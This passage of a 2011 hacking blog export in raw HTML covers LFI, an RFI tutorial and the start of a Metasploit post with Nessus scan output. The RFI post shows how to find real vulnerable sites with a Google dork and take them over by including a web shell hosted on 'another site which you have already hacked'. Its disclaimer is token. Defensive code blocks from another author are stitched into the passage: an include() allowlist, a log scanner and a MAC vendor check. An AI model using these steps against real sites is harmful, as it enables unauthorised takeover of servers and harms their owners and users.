<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">It will successfully inject <o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Tada! You get the command prompt of the host.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">(As for the pentest monkey shell, you need netcat and an open port to get the connection back.)<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Warning:
</span></u></b></span><span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 12pt; line-height: 115%;">I am not responsible for your actions; please be careful. This is for educational purposes only.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 12pt; line-height: 115%;">You hardly find LFI-vulnerable sites; you need to work your ass off to get the sites.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 12pt; line-height: 115%;">--------------------------------------------------------------------------------------------------------<u><o:p></o:p></u></span></b></span></div>
</div>
sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com1tag:blogger.com,1999:blog-7651709861170417818.post-13172834225291835192011-10-17T23:02:00.000-07:002011-10-17T23:02:54.568-07:00RFI (Remote File Inclusion)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Remote File Inclusion</span></b></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> (RFI) is a type of vulnerability found in some websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to code execution on the web server.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify; text-indent: 1.0in;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">The main cause is the use of unvalidated external variables; the most notable case is the include statement.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">The vulnerable code looks like this:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><span><br /></span></span></span></div>
<div style="background: #F9F9F9; border: dashed #2F6FAB 1.0pt; mso-border-alt: dashed #2F6FAB .75pt; mso-element: para-border-div; padding: 12.0pt 12.0pt 12.0pt 12.0pt;">
<pre style="background: #F9F9F9; border: none; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span class="kw2"><b><span style="background: white; color: black;"><?php</span></b></span><span style="background: white; color: black;"><o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span style="background: white; color: black;"><span> </span></span><span class="kw1"><span style="background: white; color: #b1b100;">include</span></span><span class="br0"><span style="background: white; color: #009900;">(</span></span><span class="re0"><span style="background: white; color: #000088;">$_GET</span></span><span class="br0"><span style="background: white; color: #009900;">[</span></span><span class="sth"><span style="background: white; color: blue;">'page'</span></span><span class="br0"><span style="background: white; color: #009900;">])</span></span><span class="sy0"><span style="background: white; color: #339933;">;</span></span><span style="background: white; color: black;"><o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span class="kw2"><b><span style="background: white; color: black;">?></span></b></span><span style="background: white; color: black;"><o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span style="background: white; color: black;"><o:p> </o:p></span></pre>
</div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
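The include() above is the root cause of both the LFI case that fimap exploits in the previous post and the RFI case described here, so the fix is the same for both. The following is an added example, not code from the original post: the vulnerable include as shown, beside a hardened version that never lets the request value reach include() as a path or URL. The page keys ('home', 'about') and the pages/ directory are assumed for illustration.

```php
<?php
// Added example, not code from the original post: the include() from the post
// next to a hardened version. The page keys ('home', 'about') and the pages/
// directory are assumed for illustration.

declare(strict_types=1);

// Vulnerable form exactly as the post shows it:
//
//     include($_GET['page']);
//
// With allow_url_include=On, ?page=http://host/shell.txt makes PHP fetch and
// run remote code (RFI). Even with it Off (the default), ?page=../ still walks
// the local filesystem (LFI), which is what fimap exploits in the post above.

// Hardened form: the request value is only ever a key into a fixed map of
// known pages, so neither a URL nor a path ever reaches include().
const PAGES = [
    'home'  => __DIR__ . '/pages/home.php',   // assumed layout
    'about' => __DIR__ . '/pages/about.php',
];

/** Map ?page= to a file path, or null when the value is not a known key. */
function resolvePage(array $get): ?string
{
    $key = $get['page'] ?? 'home';
    if (!is_string($key)) {            // ?page[]=x arrives as an array
        return null;
    }
    return PAGES[$key] ?? null;        // unknown key -> null, never a path
}

function includePageHardened(array $get): void
{
    $path = resolvePage($get);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Run from the CLI: checks the probe values used in the post (constructed input).
if (PHP_SAPI === 'cli') {
    foreach (['home', 'about', '../', 'http://www.site.com/shell.txt', ['x']] as $probe) {
        $result = resolvePage(['page' => $probe]);
        printf("%-34s -> %s\n", is_array($probe) ? 'array' : $probe,
            $result === null ? 'rejected' : 'pages/' . basename($result));
    }
}
```

The allowlist is the part that matters: sanitising the string (stripping "../" or "http://") is what people usually try first, and it keeps breaking on encodings the filter did not anticipate. As defence in depth, keep allow_url_include = Off in php.ini (it is Off by default) and set open_basedir so that even a traversal bug cannot read outside the web root.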
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">To attack, what you do is search for a site:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Example: using the Google dork inurl:php?page= or something of that kind; the URL should look like:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">www.site.com/somefile.php?page=www.somesite.com<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Well, you won't find RFI-vulnerable sites these days; you may find one or two in a million, or maybe none. This is for educational purposes only, but I will be explaining it with screenshots.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Step 1: find the vulnerable site.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Then place ../ at the end of the URL (remove the content after page=), like this:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Ex:www.site.com/somefile.php?page=../<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">If it shows some kind of error like this:</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-size: 13.5pt; line-height: 115%;">Warning</span></b></span><span class="apple-style-span"><span style="background: white; color: black; font-size: 13.5pt; line-height: 115%;">: file(../) [<a href="http://www.cbspk.com/v2/function.file"><span style="color: black;">function.file</span></a>]:
failed to open stream: Permission denied in<b>\\systemname\</b></span><b>users\ in
line</b><span>.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCprHmuiuB78J0SyuYLLRW_Yw_TebOdO4vXd58cWB8vLukhLO_VIXtTBMKLuO3TAYtVM3hyphenhyphen6f7umyBhyqaRBfLCZQ0dSWEfLslHG9sDZqZkXTUeXtadSloZOgICfWPMPexWJYPrKLvCUA/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCprHmuiuB78J0SyuYLLRW_Yw_TebOdO4vXd58cWB8vLukhLO_VIXtTBMKLuO3TAYtVM3hyphenhyphen6f7umyBhyqaRBfLCZQ0dSWEfLslHG9sDZqZkXTUeXtadSloZOgICfWPMPexWJYPrKLvCUA/s640/1.png" width="640" /></a></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Then it is vulnerable to RFI.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Sometimes, if you are lucky, you can check directly by inserting another URL.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Ex:www.site.com/file.php?page=<b>www.google.com</b><o:p></o:p></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAlP_sjEI1t9xJ6y0J3WWXqUgmY_7gRi5TSaIdDf8kqm9a3zRTVddQV12vD8b4bKSVBwyYV7g-CK5AEtkAQ_UE32-RuyO5A32xEg_g-yy2uMDpCATuMl6SHye9PksCjctKMmEcYPxLRD0/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAlP_sjEI1t9xJ6y0J3WWXqUgmY_7gRi5TSaIdDf8kqm9a3zRTVddQV12vD8b4bKSVBwyYV7g-CK5AEtkAQ_UE32-RuyO5A32xEg_g-yy2uMDpCATuMl6SHye9PksCjctKMmEcYPxLRD0/s640/2.png" width="640" /></a></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">That's it. Now, to take over this site, all you need is a <b>SHELL</b>. A shell is like an unauthorized backdoor control panel for the website, and it should have the .txt extension.</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> (* <b>I'm not responsible for any of your actions; for educational purposes only</b>.*)<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Now put in the URL like this: www.site.com/file.php?id=http://www.site.com/shell.txt<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">This shell.txt comes from another site which you have already hacked and uploaded the txt file to.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">You will see something like this: tada!<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2DqXS2bnCwvzJ_W-K5ITtZIIio_8kqC5VYbh5efv5EvffuKZPQV-QpbdWoTho3t8nM9xrjQCrlB4BPN-i6_42s_lh_rVCOeEJ3kD-kFAKCLSvXvHbIhA7qYwLemxVINBNLDD2BRMijkM/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2DqXS2bnCwvzJ_W-K5ITtZIIio_8kqC5VYbh5efv5EvffuKZPQV-QpbdWoTho3t8nM9xrjQCrlB4BPN-i6_42s_lh_rVCOeEJ3kD-kFAKCLSvXvHbIhA7qYwLemxVINBNLDD2BRMijkM/s640/3.png" width="640" /></a></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
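Both probes the post walks through, page=../ and page=http://.../shell.txt, are easy to spot on the server side, because they leave the request line in the web server's access log. The following is an added example, not code from the original post: a small PHP CLI script that reads combined-format access log lines, decodes each query-string value and flags traversal (LFI) and URL-valued (RFI) parameters. The log lines are constructed for this demo, and the assumption that any parameter may be a file parameter is deliberate so that nothing depends on the name "page".

```php
<?php
// Added example, not code from the original post: flags file-inclusion probes
// in combined-format access log lines. The log lines below are constructed for
// the demo; the IPs are from the 203.0.113.0/24 documentation range.

declare(strict_types=1);

const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [17/Oct/2011:23:02:54 -0700] "GET /somefile.php?page=home HTTP/1.1" 200 512
203.0.113.5 - - [17/Oct/2011:23:03:01 -0700] "GET /somefile.php?page=../ HTTP/1.1" 200 1044
203.0.113.5 - - [17/Oct/2011:23:03:09 -0700] "GET /somefile.php?page=http://www.site.com/shell.txt HTTP/1.1" 200 8230
203.0.113.9 - - [17/Oct/2011:23:04:10 -0700] "GET /file.php?page=..%2F..%2Fsomefile HTTP/1.1" 200 2048
203.0.113.9 - - [17/Oct/2011:23:04:30 -0700] "GET /index.php?page=about HTTP/1.1" 200 600
LOG;

/**
 * Classify one access log line: null when nothing looks like an inclusion
 * probe, otherwise 'rfi' (URL-valued parameter) or 'lfi' (directory traversal).
 */
function classifyRequest(string $line): ?string
{
    // Pull the request target out of the quoted "METHOD /path HTTP/x.y" field.
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return null;                       // no query string at all
    }
    parse_str($query, $params);            // splits and percent-decodes values
    foreach ($params as $value) {
        if (!is_string($value)) {
            continue;                      // nested arrays (page[]=x) skipped
        }
        // RFI: the value starts with any URL scheme ("http://", "ftp://", ...).
        if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $value)) {
            return 'rfi';
        }
        // LFI: traversal, either decoded by parse_str or still double-encoded.
        if (str_contains($value, '../') || str_contains($value, '..\\')
            || stripos($value, '%2e%2e') !== false) {
            return 'lfi';
        }
    }
    return null;
}

/** Scan a whole log and return [kind, line] pairs for every flagged request. */
function scanLog(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $kind = classifyRequest($line);
        if ($kind !== null) {
            $hits[] = [$kind, $line];
        }
    }
    return $hits;
}

if (PHP_SAPI === 'cli') {
    foreach (scanLog(SAMPLE_LOG) as [$kind, $line]) {
        echo strtoupper($kind), '  ', $line, PHP_EOL;
    }
}
```

Run with a current PHP (8.0 or later, for str_contains). On the constructed log the script reports lines two and four as LFI and line three as RFI; the post's scheme-less check, page=www.google.com, is not caught by the scheme rule and would need a separate heuristic. A 200 status next to such a request is the line worth escalating, since the server did not reject the include.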
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-84179518983619695932011-10-15T04:38:00.000-07:002011-10-25T01:52:01.672-07:00Metasploit Basic exploiting for new Starters<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<br /></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableLightShading" style="border-collapse: collapse; border: none; mso-border-bottom-alt: solid black 1.0pt; mso-border-bottom-themecolor: text1; mso-border-top-alt: solid black 1.0pt; mso-border-top-themecolor: text1; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184; width: 100.96%;">
<tbody>
<tr>
<td style="border-bottom: solid black 1.0pt; border-left: none; border-right: none; border-top: solid black 1.0pt; mso-border-bottom-themecolor: text1; mso-border-top-themecolor: text1; padding: 0in 5.4pt 0in 5.4pt; width: 100.0%;" valign="top" width="100%"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; mso-yfti-cnfc: 5;">
<b><span style="color: #4f81bd; font-family: 'Times New Roman', serif; font-size: 12pt;">SCANNED
WITH NESSUS</span></b><b><span style="color: black; font-family: 'Times New Roman', serif; font-size: 12pt;"> :<o:p></o:p></span></b></div>
</td>
</tr>
<tr>
<td style="background: silver; border: none; mso-background-themecolor: text1; mso-background-themetint: 63; padding: 0in 5.4pt 0in 5.4pt; width: 100.0%;" valign="top" width="100%"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; mso-yfti-cnfc: 68;">
<b><span style="color: black; font-family: 'Times New Roman', serif; font-size: 12pt;">IP : 192.168.*.*<o:p></o:p></span></b></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid black 1.0pt; border: none; mso-border-bottom-themecolor: text1; padding: 0in 5.4pt 0in 5.4pt; width: 100.0%;" valign="top" width="100%"><table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="mso-cellspacing: 0in; mso-padding-alt: 1.5pt 1.5pt 1.5pt 1.5pt; mso-yfti-tbllook: 1184; width: 100.0%;">
<tbody>
<tr>
<td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt;"></td>
</tr>
<tr>
<td colspan="2" style="padding: 1.5pt 1.5pt 1.5pt 1.5pt;"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">
</span><br />
<hr align="center" size="2" width="100%" />
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">
</span></div>
</td>
</tr>
<tr>
<td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt;"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Number of vulnerabilities<o:p></o:p></span></div>
<div align="center">
<table border="0" cellpadding="0" class="MsoNormalTable" style="mso-cellspacing: 1.5pt; mso-yfti-tbllook: 1184; width: 60.0%;">
<tbody>
<tr>
<td style="padding: .75pt .75pt .75pt .75pt;"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Open ports : <o:p></o:p></span></div>
</td>
<td style="padding: .75pt .75pt .75pt .75pt;"><div align="right" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: right;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">29<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: .75pt .75pt .75pt .75pt;"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">High : <o:p></o:p></span></div>
</td>
<td style="padding: .75pt .75pt .75pt .75pt;"><div align="right" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: right;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">300<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: .75pt .75pt .75pt .75pt;"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Medium : <o:p></o:p></span></div>
</td>
<td style="padding: .75pt .75pt .75pt .75pt;"><div align="right" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: right;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">47<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: .75pt .75pt .75pt .75pt;"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Low : <o:p></o:p></span></div>
</td>
<td style="padding: .75pt .75pt .75pt .75pt;"><div align="right" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: right;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">77<o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
</div>
</td>
<td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt;"></td>
</tr>
<tr>
<td colspan="2" style="padding: 1.5pt 1.5pt 1.5pt 1.5pt;"><div align="center" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">
</span><br />
<hr align="center" size="2" width="100%" />
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">
</span></div>
</td>
</tr>
<tr>
<td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt;"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Remote host information<o:p></o:p></span></div>
<div align="center">
<table border="0" cellpadding="0" class="MsoNormalTable" style="mso-cellspacing: 1.5pt; mso-yfti-tbllook: 1184; width: 60.0%;">
<tbody>
<tr>
<td style="padding: .75pt .75pt .75pt .75pt;"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Operating System : <o:p></o:p></span></div>
</td>
<td style="padding: .75pt .75pt .75pt .75pt;"><div align="right" class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: right;">
<span style="font-family: 'Times New Roman', serif; font-size: 12pt;">Microsoft
Windows Server (English)<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: .75pt .75pt .75pt .75pt;"></td>
<td style="padding: .75pt .75pt .75pt .75pt;"></td>
</tr>
<tr>
<td style="padding: .75pt .75pt .75pt .75pt;"></td>
<td style="padding: .75pt .75pt .75pt .75pt;"></td>
</tr>
</tbody></table>
</div>
</td>
<td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt;"></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<br /></div>
<div align="center">
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="mso-cellspacing: 0in; mso-padding-alt: 0in 0in 0in 0in; mso-yfti-tbllook: 1184; width: 70.0%;">
<tbody>
<tr>
<td style="padding: 0in 0in 0in 0in;"></td>
</tr>
</tbody></table>
</div>
<div class="MsoNormal">
<b>Synopsis:</b><br />
The remote host seems to be a VMware virtual machine.<br />
<br />
<b>Description:</b><br />
According to the MAC address of its network adapter, the remote host is a
VMware virtual machine.</div>
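The Nessus finding above rests on a MAC address OUI lookup. The following Python is an added example, not the plugin's own code: it classifies a scanned host's MAC the same way and, as the check a practitioner wants, flags locally administered addresses, where the OUI says nothing about the vendor. The OUI table is a constructed excerpt of the IEEE registry.

```python
"""Classify a scanned host as a virtual machine by its MAC address OUI.

Added example, not from the original post or from Nessus. The vendor table is a
small constructed excerpt; a production check would load the full IEEE OUI
registry instead.
"""
import re
from typing import Optional, Tuple

# Constructed excerpt of the IEEE OUI registry (first 24 bits of the MAC).
VIRTUAL_OUIS = {
    "005056": "VMware",
    "000C29": "VMware",
    "000569": "VMware",
    "001C14": "VMware",
    "080027": "VirtualBox",
    "00155D": "Microsoft Hyper-V",
}

_NON_HEX = re.compile(r"[^0-9A-Fa-f]")


def normalize_mac(mac: str) -> str:
    """Return the 12 hex digits of a MAC, upper-case, for any common notation
    (00:50:56:AB:CD:EF, 00-50-56-ab-cd-ef, 0050.56ab.cdef)."""
    digits = _NON_HEX.sub("", mac).upper()
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return digits


def is_locally_administered(mac: str) -> bool:
    """True if the U/L bit (bit 1 of the first octet) is set.

    Such addresses were chosen by software (randomised, cloned or spoofed), so
    the OUI does not identify the hardware vendor and a VM verdict based on it
    is unreliable."""
    first_octet = int(normalize_mac(mac)[:2], 16)
    return bool(first_octet & 0x02)


def classify_host(mac: str) -> Tuple[str, Optional[str]]:
    """Return (verdict, vendor).

    'virtual'    -> OUI belongs to a known hypervisor vendor (vendor given)
    'unknown'    -> OUI not in the table
    'unreliable' -> locally administered address; do not trust the OUI
    """
    digits = normalize_mac(mac)
    if is_locally_administered(digits):
        return ("unreliable", None)
    vendor = VIRTUAL_OUIS.get(digits[:6])
    if vendor:
        return ("virtual", vendor)
    return ("unknown", None)


if __name__ == "__main__":
    # Constructed sample addresses for demonstration.
    for sample in ("00:50:56:9a:1b:2c", "0800.27aa.bbcc",
                   "02:50:56:00:00:01", "a4:5e:60:11:22:33"):
        print(sample, "->", classify_host(sample))
```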
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<b><u>LIST OF OPEN PORTS:</u></b></div>
<div class="MsoNormal">
<b><u><br /></u></b></div>
<div class="MsoNormal">
